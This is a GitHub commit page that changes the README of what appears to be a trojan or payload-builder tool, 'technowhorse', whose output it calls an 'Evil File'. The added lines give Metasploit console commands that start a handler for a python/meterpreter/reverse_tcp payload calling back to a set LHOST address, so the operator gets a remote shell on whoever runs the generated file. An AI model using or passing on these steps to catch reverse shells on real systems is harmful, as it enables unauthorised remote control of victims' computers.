Skip to content

Commit

Permalink
fix
Browse files Browse the repository at this point in the history
  • Loading branch information
PushpenderIndia committed Apr 20, 2022
1 parent fdf3b80 commit 56fd169
Showing 1 changed file with 4 additions and 1 deletion.
5 changes: 4 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -229,10 +229,13 @@ Note: You can also use our custom icons from the icon folder, just use them like

## Note:- Evil File will be saved inside dist/ folder, inside technowhorse/ folder

## Establishing Connection
## Establishing Connection Using Msfconsole

* You Need to Install Metasploit-Framework on your system for establishing connection

* Recommended Settings, You can try to test it with any other payload in line 2
```
$ sudo msfconsole
msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 192.168.43.221
Expand Down

0 comments on commit 56fd169

Please sign in to comment.